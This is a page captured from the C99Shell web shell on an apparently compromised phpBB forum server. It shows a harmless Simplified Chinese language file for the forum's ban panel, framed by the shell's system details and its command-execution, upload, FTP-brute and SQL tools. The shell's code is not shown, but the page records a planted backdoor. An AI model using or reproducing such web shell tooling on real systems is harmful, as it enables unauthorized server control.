!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpbb3/language/zh_cmn_hans/acp/   drwxrwxr-x
Free 83.27 GB of 96.73 GB (86.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ban.php (3.64 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
*
* acp_ban [Chinese Simplified]
*
* @package language
* @version $Id: ban.php 8479 2008-03-29 00:22:48Z naderman $
* @copyright (c) 2007 phpbbchina.com
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
*
*/

/**
* DO NOT CHANGE
*/
if (!defined('IN_PHPBB'))
{
    exit;
}

if (empty(
$lang) || !is_array($lang))
{
    
$lang = array();
}

// DEVELOPERS PLEASE NOTE
//
// All language files should use UTF-8 as their encoding and the files must not contain a BOM.
//
// Placeholders can now contain order information, e.g. instead of
// 'Page %s of %s' you can (and should) write 'Page %1$s of %2$s', this allows
// translators to re-order the output of data while ensuring it remains correct
//
// You do not need this where single placeholders are used, e.g. 'Message %d' is fine
// equally where a string contains only two placeholders which are used to wrap text
// in a url you again do not need to specify an order e.g., 'Click %sHERE%s' is fine

// Banning
$lang array_merge($lang, array(
    
'1_HOUR'        => '1小时',
    
'30_MINS'        => '30分钟',
    
'6_HOURS'        => '6小时',

    
'ACP_BAN_EXPLAIN'    => '在这里您可以进行对用户名、IP地址或信箱地址的封禁操作。这些操作可以阻止特定用户访问整个论坛。如果愿意,您可以给出一个简短(至多255字节)的封禁理由,它将显示在管理记录中。您也可以控制封禁期限,如果您希望设定一个封禁解除日期,请将封禁期限设定为 <u>直到</u> ,并在下面以 yyyy-mm-dd(年-月-日)的格式填入日期。',

    
'BAN_EXCLUDE'            => '排除于封禁列表',
    
'BAN_LENGTH'            => '封禁期限',
    
'BAN_REASON'            => '封禁原因',
    
'BAN_GIVE_REASON'        => '显示给被封者的封禁原因',
    
'BAN_UPDATE_SUCCESSFUL'    => '封禁列表更新成功',

    
'EMAIL_BAN'                    => '封禁信箱地址',
    
'EMAIL_BAN_EXCLUDE_EXPLAIN'    => '被排除的Email地址将不受任何封禁影响。',
    
'EMAIL_BAN_EXPLAIN'            => '要指定多个Email地址,请在每行输入一个。可以使用 * 作为通配符,例如:<samp>*@hotmail.com</samp>,<samp>*@*.domain.tld</samp>,等。',
    
'EMAIL_NO_BANNED'            => '没有被封禁的信箱地址',
    
'EMAIL_UNBAN'                => '解除封禁或解除排除Email地址',
    
'EMAIL_UNBAN_EXPLAIN'        => '您可以选择多个Email地址并对其执行解除封禁或解除排除的操作。被指定为排除的Email地址有特别背景标记。',

    
'IP_BAN'                    => '封禁IP地址',
    
'IP_BAN_EXCLUDE_EXPLAIN'    => '被排除的IP地址将不受任何封禁影响。',
    
'IP_BAN_EXPLAIN'            => '要指定多个IP地址或域名,请在每行输入一个。要指定IP段,在两个IP地址间使用连字符(-)连接。通配符是 *。',
    
'IP_HOSTNAME'                => 'IP地址 或 域名',
    
'IP_NO_BANNED'                => '没有被封禁的IP地址',
    
'IP_UNBAN'                    => '解除封禁或解除排除IP地址',
    
'IP_UNBAN_EXPLAIN'            => '您可以选择多个IP地址并对其执行解除封禁或解除排除的操作。被指定为排除的IP地址有特别背景标记。',

    
'LENGTH_BAN_INVALID'        => '日期格式必须为 <kbd>YYYY-MM-DD</kbd>.',

    
'PERMANENT'        => '永久',
    
    
'UNTIL'                        => '直到',
    
'USER_BAN'                    => '封禁用户名',
    
'USER_BAN_EXCLUDE_EXPLAIN'    => '被排除的用户名将不受任何封禁影响。',
    
'USER_BAN_EXPLAIN'            => '要指定多个用户名,请在每行输入一个。您可以使用【查找用户】来查找和添加用户名。',
    
'USER_NO_BANNED'            => '没有被封禁的用户名',
    
'USER_UNBAN'                => '解除封禁或解除排除用户名',
    
'USER_UNBAN_EXPLAIN'        => '您可以选择多个用户名并对其执行解除封禁或解除排除的操作。被指定为排除的用户名有特别背景标记。',
    

));

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0089 ]--